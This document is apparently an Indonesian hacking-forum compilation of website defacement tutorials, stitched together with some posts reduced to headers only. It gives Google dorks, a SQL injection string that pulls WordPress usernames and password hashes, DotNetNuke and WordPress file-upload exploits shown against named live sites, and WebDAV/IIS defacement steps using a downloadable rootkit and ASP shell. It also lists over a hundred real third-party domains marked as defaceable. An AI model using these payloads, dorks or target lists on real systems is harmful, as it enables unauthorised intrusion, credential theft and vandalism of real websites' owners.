[TUTOR] ByPass Symlink 403 Forbidden with .htaccess

hehe , malam minggu gada kerjaan , gak punya cewe pula =))
yowess tak posting aja ini thread yg ane dapat dari grup CBF Team untuk para reader tercinta

Oke langsung saja yup..

langsung aja buat file .htaccess (tepat dimana direktori symlink berada)
trus isikan fungsi fungsi nya sbg berikut:

JoomSocial Joomla Shell Upload Vulnerability

helooo everyy..body.... 
disini saya ingin share sedikit cara tamper data joomsocial
cekidoooot aja yo biar ga banyak spik ~

Yang di butuh kan :
Firefox
sebuah Shell
Tamper Data
Vulnerable Site
& a Brain

Luxun CMS SQL Injection Vuln

Hey Bro..
ga sengaja ane nemu ini di http://1337day.com/

langsung aja yah

google dork :
- "powered by luxun"
- inurl:product.php?classid=
- inurl:news.php?classid=

Exploit Wordpress dengan upload-form.php

Dork: inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php

live target : http://stamford.mylocalevents.net/wp-con...d-form.php

Hasilnya : http://stamford.mylocalevents.net/wp-content/uploads/2012/04/sutul.txt

numayan buat ngarsip di indeves kak :)

hehe :)

[NEW] SQL INJECTION POWERED BY DIBEKASI.NET + ADMIN PAGE (NEW UPDATE)

################################################################################​#
title : powered by dibekasi.net SQLi vulner
author : bumble_be
contact : iogi89@ymail.com
web : bumble-be.us / linggau-haxor.com
################################################################################​########
dork : allinurl: page_info.php?id_brt=
vendor : dibekasi.net

Wordpress Blog Exploit connect to facebook

Dork: inurl:"fbconnect_action=myhome" 




entar agan2  bakal ketemu beberapa info admin di halaman tersebut...
trus ganti url webnya yang ini: ?fbconnect_action=myhome&userid=

menjadi seperti ini:

Code:

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z​0mbyak,7,8,9,10,11,12+from+wp_users-- 

liat, kamu sukses inject, nah sekarang masalahnya, bagaimana kamu crack itu hash password

Tools Deface Wordpress pakai dork : inurl:"fbconnect_action=myhome"

SQL Injection Praktis dengan Tool

[-]XCode SQL Injection/LFI/XSS/Webshell scanner

Code:

http://ferdianelli.wordpress.com/2011/01/08/update-08-jan-2011-xcode-sqlilfixss-vulnurable-webshell-scanner/

[-]Reiluke SQLi helper Vers 2.7

Code:

http://www.ziddu.com/download/10062751/sqliHelper2.7.zip.html

jalankan Reiluke SQL Injection/XXS/RFI/LFI scanner dan masukkan dork tersebut.

SPOILER: HIDE

Tunggu beberapa saat dan kemudian ditemukan 112 web yang akan di test bug sqli

Beberapa kumpulan Web yang bisa di Deface pake WebDav

assalamualaikum gan .. :)
nih bagi yg suka deface pake Webdav ane punya sekumpulan Web yang bisa di deface pake Webdav ..

langsung aja yok ke TKP ...

synacom.fr
specialreports.it
stay.online.se
cdenv-koksijde.be
www.wxcams.be
www.karcherwestmachines.be
www.parrocchiapieve.qdp.it
tfisatolam.leumit.co.il
so-sighty.fr
lapetitehublais.fr
http://careers.royalcanin.us
http://synacom.fr/index.html
http://www.kudretliforum.net
http://stay.online.se
http://www.wxcams.be
http://bouwmeteo.be
http://cdenv-koksijde.be/
http://cdenv-koksijde.be/
http://grandrapids.sellstufflocal.com
http://kite.infometeo.be
http://nl.meteokust.be/
http://nojo.busanilbo.com
http://www.kitemeteo.be/
http://www.skimonitor.com/
http://www.wxcams.be/
http://www.computer-professionals.net/
http://vforms.royalcanin.us/
http://sciotorugby.com/
http://hdchrome.com/
http://columbusrugby.com/
http://carrelages-palmieri.com/admin/
http://centro.anje.pt/
http://blog.qtmanage.com/
http://www.berzeshop.info/
http://www.creativecredits.com
http://www.csmarketingco.com/
http://www.doingbusiness2007.gob.mx/
http://www.yuhuangd.com/
http://card.baoanren.com
http://www.fondazionefimp.org
http://www.ljmjfj.com/
http://www.lsqqby.cn
http://www.pxry.gz.cn/
http://www.schongyang.cn/
http://www.sxxart.com/
http://www.yuhuangd.com/
http://xljk.cumtb.edu.cn/
http://bbs.tiaofun.com/
http://buxingjie365.com/
http://ad.aiyag.com/
http://bx.xsxgxx.com
http://card.baoanren.com/
http://asjtfw.com/
http://crbbg.com
http://crm.gongrenzhaopin.com/
http://dalimj.com
http://disk.hzyhzhx.com/
http://habitatstoreonline.com
http://infoprompt.net/
http://jindugardenhotel.com
http://lzsx.sclz.net.cn
http://member.wealth-mentors.com/
http://my.scqiche.net/
http://mytel070.co.kr/
http://pcfan.com.tw
http://punchaboveyourweight.com
http://qzy.resumstore.baikejob.com
http://sialn.com
http://sjxyz.cn
http://sjzasd.com
http://sqqsxx.pyedu.cn
http://stihl.rental2k.it
http://tcc.e-bestis.com.tw
http://tp.tourispac.ch
http://tw.baskr.com
http://www.66198198.com
http://www.913173.com
http://www.bjqxb.com
http://www.df-lighting.com
http://www.dpa.com.v
http://www.dzslyy.com
http://www.euicex.com
http://www.jindr.cn
http://www.jjcrj.com.cn
http://www.leaderkx.com
http://www.lfdf.net
http://www.lichangzhu.com
http://www.mo5.cn
http://www.momaxx-trading-gmbh.de
http://www.psdp-egypt.info
http://www.qasoft.com.cn
http://www.qhdpt.com
http://www.r80rugby.co.nr
http://www.skhlmcmps.edu.hk
http://www.thedepository.biz
http://www.xalawyer.net
http://www3.office-sp.co.jp
http://www.dedicated-servers-host.com
http://www.gratismp3musik.com

nah itu sob , web nya :)
Semoga bermanfaat .. :)

thanks to D35M0ND142

deface wap wen.ru pake HP

deface wap wen.ru

Anda mempunyai wapsite di wen.ru ? Hati hatilah karena buanyak banget para newbie cracker berkeliaran mencari target yang akan di jadikan sasaran mereka menyisipkan file untuk mendeface dan me redirect / mengalihkan url / alamat wap kamu . Jadi seolah olah alamat / url wap kamu hilang, padahal kamu sudah benar mengetikkan alamat wap kamu di browser kamu. nah loh ?? Ini pernah terjadi pada akun wapsiteku sgenk.wen9.net dan wapgratis.wen.ru yang berusaha di deface dan di redirect oleh mereka. aku ucapkan terimakasih bagi teman2 cracker yang udah sudah menyusup ke dalam akun wapsitku, Lanjutkansemoga nanti temen temen bisa menyusup ke situs situs yang lebih besar dan yang celahnya rapat, karena bagaimanapun hal yang besar di awali dari yang kecil . bener /ga ?dan lebih kreatif lagi.
LANGSUNG TO THE POINT aja
Bagimana cara penyusupan mereka ?
Setelah aku selidiki, ternyata mereka menyusupkan file nya melaluhi fasilitas UPLOAD FILE yang aku buat. Tujuanku membuat upload file biar memudahkan aku / temen2 yang lain untuk upload file tanpa login.
File file dengan ekstensi apa saja bisa di upload asal tidak lebih dari 5 MB.
Karena di wen.ru hanya boleh memakai 3 index dengan format index.wml , index.xhtml , index.html .
biasanya saya hanya memakai satu atau dua index dalam sebuah wapsite, nah disini kelemahan nya, mereka menyisipkan 1 index yang tersisa dengan listing kode yang mereka buat.
PENCEGAHAN
Nah setelah tau kelemahan sekarang pencegahan nya gimana ?
Menurut saya cuma ada dua:
1. Jangan menyediakan fasilitas upload di wapsite kita wen.ru
2. Kalaupun menyediakan fasilitas upload, buatlah masing masing indexnya yaituindex.wml , index.xhtml ,dan index.html untuk halaman depan. Dan pastikan pengaturan tidak mengizinkan untuk menulis ulang nama file /rewrite files di menu setting nya, tapi biasanya sudah default nya begitu.
Nah mudah mudahan jadi aman wap ente di wen.ru
Kamu pengen nyoba juga jadi cracker dan mendeface / me redirect site wen.ru ? untuk pembelajaran kita semua saja, trik ini tidak akan merusak kok content file, cuma menyelipkan file aja.
LANGKAH LANGKAH ;
1. Siapkan file kamu dengan nama index.wml , index.xhtml ,dan index.html . Sudah tau isinya kan ?
Contoh: index.html

<html>
<head>
</head>
<title> site hasbeen hacked by kamu </title>
<body>
Site ini sudah di hack bla bla bla
</body>
</html>
atau jika ingin me redirect ke situs lain tinggal menambahkan kode diantara <head>
</head>

<meta http-equiv="refresh" content="1;URL=http://url tujuan pindah" />
maka site yang kebuka langsung ke tujuan pindahan.
Nah setelah ketiga file nya siap simpan ya.
2. Mencari target situs wen.ru yang menyediakan fasilitas upload dengan memanfaatkan google search tentunya dgn mengetikkan : "inurl=wen.ru/upl" , "inurl=wen.ru/upload" atau "inurl=wen.ru/add" atau terserah kamu lah, yang penting dapat target.
3. Setelah dapat, kamu tinggal upload file yang udah kamu buat tadi.
4. Lihat hasil nya ?
Berhasil = selamat !! Kamu bisa
Gagal = kemungkinan ke 3 filenya udah di buat sama yang punya, SILAHKAN CARI TARGET LAGI

source: http://sgenk.blogspot.com/2009/10/deface-wap-wenru.html

Deface Via Handphone

Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘  kata beberapa orang, Saya hanya seorang Newbie yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul.

Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan adalah system yg bekerja mendukung applikasi it sendiri (Java, SymBian, Linux, Windows, Android etc). Dan ukuran atau kapasitas serta kemampuan menampilkan web. Tapi pada dasarnya cara kerjanya tetap. Sama, jadi apa yg bisa dilakukan lwt pc,kmgknan bsa jg dikerjakan lwt hape…!

Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit
melalui hape.

Bahan2 yg kita butuhkan adalah:

1. Operamini browser versi 5.0
2. Operamini browser versi 4.2

Kenapa pake 2 Web Browser ?

Lebih enak pake 2 browser di atas.alasannya adalah:

1. Operamini 5.0 mendukung multi tab jadi cocok buat mencari target dan mengetesnya   tanpa harus open close satu2.

2. Operamini 5.0 mempunyai kemampuan copi paste,pilih text dan lgsg mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.

3. Operamini 4.2 respon browser lbh bagus dr yg v 5.0

Setelah cek target dr opmin 5.0 dan ternyata vuln tgl copy kan aja linknya di operamini 4.2 .
Tgl kta exploit lwt situ..
(Operamini 4.2 tdk multi tab,untuk yg multi tab slhkan cari di opera modif di google)

Nah sekarang memasuki langkah2 atau cara2 melakukan hack web dgn DNN exploit melalui opera mini.

Pertama: pastikan anda masih mempunyai saldo pulsa
Kedua: buka operamini v 5.0 anda dan ketik di kolom google search dorknya->

inurl:”/portals/0″  

And search!!…
Nah dapet kan??
Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di keypad hape anda.
Pilih open in new tab.
Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab.
Oh,ya untuk mengetahu gimana ,apa dan bagaimana DNN exploit it silahkan baca disini:

http://securityreason.com/exploitalert/6234

Next, misalkan kita dah dpt targetnya nih…

Example site:
http://fril.co.il/portals/0/cwindex.txt

Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn
/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  

->http://site.com/[path]/portals/0/a.txt

Menjadi
->http://site.com/[path]/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  

Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik
copas lagi.

Setelah dapet dan pasti vuln seperti site di bawah ini.

http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Copy dan pastekan di opera 4.2 kamu.
Nb:Alasannya knapa pindah browser yaitu pada opera 5.0 di hape saya kurang respon pada perintahupload. Proses upload berjalan tapi file tidak terupload dan begitu di coba di v 4.2 sukses terupload. Tapi bila di v.5.0 km bisa ya lanjut aja disitu.gak ush pndah applikasi.
Lanjut proses.!

Setelah site target di buka di opmin 4.2

Pilih : file ( select a file on your site)

Tunggu biar loading selesai dan menampilkan 2 kolom:

Kolom 1 biasanya tulisan ‘root’
Kolom 2 berisi macam2 file.
Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini:
javascript:__doPostBack(‘ctlURL $cmdUpload’,”)

Lalu klik ok….

Kolom yg tdnya berisi ‘root’ dan ‘jenis2 file’
Skrg ganti menjadi kolom ‘root’ dan kolom kosong untuk upload file.
Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km.
SUCCESS..! you cAn hacked a web site from mobile phone.

Hasilnya seperti ini http://fril.co.il/portals/0/xadal.txt < 100% lewat handphone

Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab.
-sekian-

Posted by Grey | Shinji Kagawa

SOURCE:BINUS HACKER

Deface via WebDav

maff ni kk sebelum nya kalo saya Repost..
maklum lah newbie saya nie , yg bisa nya cuman repost..

ok deh , ni langsung ke tkp

Tools Rootkit [ By Mastah Hmei7 ]

Download :

http://www.ziddu.com/download/15996783/ls-rootkit.zip.html

Mirror:http://www.mediafire.com/?ebjt2ccjvvyrm37 >> Pass: cbf

Tutorialnya :

Buka Rootkit itu .

Rootkit.exe

Kemudian Cari WebDav

Muncul Pilihan

Plih

Asp Shell Maker

Pencet Add Site

Contoh Target :

http://www.bao168.com

http://www.hkloong.com

http://www.gteec.com/

http://www.balingshan.com/

http://www.hrbswx.com/

http://www.871871.cc/

http://www.md999.net.cn/

http://bbs.nan-gang.gov.cn/

http://www.icts-mz.com/

http://www.hnains.net/

http://www.hlyy-sh.com/

http://www.hsgtzy.gov.cn/

Pilih salah satu web diatas

Nah ini dia trik yg saya kemukakan sendirian .

[ Otodidak ]

Sudah Pilih website pencet oke

kemudian pencet setting

Name off your shell : /Hmei7.asp;.txt

Ganti pake nama filemu .

Contoh : darkdivision.html

Kemudian ada bacaan

"Write Your Shell Here"

Hapus Semua Script yg disana .

Kemudian ubah pake scriptmu defacemu .

Kemudian Pencet "Serang!!"

Lihat dikotak putih [ Sebelah kiri ]

Jika ada bacaan

checking : http://www.hrbswx.com

    shell created !!

    http://www.hrbswx.com/Hacked.htm

berarti sukses .

http://www.hrbswx.com : Contoh web sbg target .

Ketik di address bar : http:/webtarget/namafile.html

^_^

Author  <-- sumber 

[Tutorial Deface pake WebFolder]

. maff ne kalo ane repost :( , soalnye ane newbie ..


bagi yg dah master lewat saja nii ..


langsung aje deh , ni ane jelasin cara nya..


 ,
Dengan menggunakan web folder yang disediakan oleh OS Windows sendiri.
Namun perlu diketahui, teknik ini hanya berlaku untuk website 
yang menggunakan OS Windows dan server IIS 5.0/6.0 .


Lalu bagaimana cara mengetahui bahwa target kita menggunakan server IIS?
Mudah saja, silakan buka netcraft.com dan masukkan target kita ke textbox
yang tersedia,maka akan kita dapatkan informasi website tersebut,
termasuk OS dan server yang digunakan.


Jika kamu ingin mendapatkan target secara acak bisa menggunakan google dork 
dengan menggunakan keyword 


allinurl:*.asp , allinurl:*.aspx 


dan sebagainya.


OK,


1. Buka My Computer lalu lihat icon web folder, 
  lalu klik 2x icon web folder tersebut (Win 98/ME/2000).
  Jika kamu menggunakan windows XP secara default tidak akan menemukan folder 
  tersebut di My Computer, tapi kamu bisa membuat secara manual
  dengan membuat shortcut baru.


Berikut langkahnya :
- Klik kanan pada desktop, kemudian pilih New -> Shortcut .
- Maka akan ada popup yang meminta untuk memasukkan lokasi tujuan,
 lalu kamu masukkan alamat dibawah ini :


%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}


- Jika sudah silakan klik Next -> Next -> Finish.
- Jika shortcut nya sudah terbentuk, lalu klik 2x pada shortcut tersebut


2. Jika kamu sudah berhasil membuka web folder
   tersebut kemudian klik kanan lalu pilih New � Web Folder


3. Lalu akan muncul popup (Add Web Folder)
   yang meminta untuk memasukkan alamat tujuan.
   Sebagai contoh kamu masukkan   http://www.aslty.com.cn  sebagai target.
   pada "Type the location to add" masukan saja link http://www.aslty.com.cn
   


4. Kemudian klik Next dan tunggu sampai prosesnya selesai,
   lama tidaknya proses tergantung koneksi internetmu.


5. Buka folder yang sudah terbentuk, nama folder biasanya mengambil dari nama domain,
   jika domainnya adalah http://www.aslty.com.cn , 
   maka nama foldernya juga http://www.aslty.com.cn.


6. Copy paste sebuah file html ke dalam web folder yang telah kamu buat ke folder 
   www.aslty.com.cn.


7. Jika proses copy paste selesai,
   sebagai contoh jika nama file kamu adalah �sohai.html� maka 
   cara melihatnya adalah dengan membuka browser dan mengetikkan 
   alamat http://www.aslty.com.cn/sohai.html




di bawah ini kumpulan websitenya yang vurln IIS 5.0/6.0 :


zgsfjw.net
centro.anje.pt
www.ziangli.com
6.shicheng.gov.cn
www.ville-mordelles.fr
www.podiocom.com
www.journeezerotracas.fr
www.journeezerotracas.com
www.journee0tracas.com
www.comune.torrice.fr.it
www.chinamaster88.com
www.chateaudelepinay.fr
www.centroformazioneitalia.it
www.bjautoobd.com
www.autodiagtool.com
usa.automotormaster.com
so-sighty.fr
perros-guirec.icor.fr
myhealthcity.com
malaysiahealthcareindonesia.com
lapetitehublais.fr
handistar.fr
gz.autoobd-ii.com
gz.automotormaster.com
expert-comptable-35.fr
carrelages-palmieri.com
camion-road-show.com
autoobd.cn
hibis.co.id
www.zjgsxy.com


Kalau mau dapet website lebih lainnya bisa di dork di google :


inurl:.ah.cn/*.asp
inurl:.bj.cn/*.asp
inurl:.cq.cn/*.asp
inurl:.fj.cn/*.asp
inurl:.gd.cn/*.asp
inurl:.gs.cn/*.asp
inurl:.gz.cn/*.asp
inurl:.gx.cn/*.asp
inurl:.ha.cn/*.asp
inurl:.hb.cn/*.asp
inurl:.he.cn/*.asp
inurl:.hi.cn/*.asp
inurl:.hl.cn/*.asp
inurl:.hn.cn/*.asp
inurl:.jl.cn/*.asp
inurl:.js.cn/*.asp
inurl:.jx.cn/*.asp
inurl:.ln.cn/*.asp
inurl:.nm.cn/*.asp
inurl:.nx.cn/*.asp
inurl:.qh.cn/*.asp
inurl:.sc.cn/*.asp
inurl:.sd.cn/*.asp
inurl:.sh.cn/*.asp
inurl:.sn.cn/*.asp
inurl:.sx.cn/*.asp
inurl:.tj.cn/*.asp
inurl:.tw.cn/*.asp
inurl:.xj.cn/*.asp
inurl:.xz.cn/*.asp
inurl:.yn.cn/*.asp
inurl:.zj.cn/*.asp
inurl:.ac.cn/*.asp
inurl:.com.cn/*.asp
inurl:.edu.cn/*.asp
inurl:.gov.cn/*.asp
inurl:.net.cn/*.asp
inurl:.org.cn/*.asp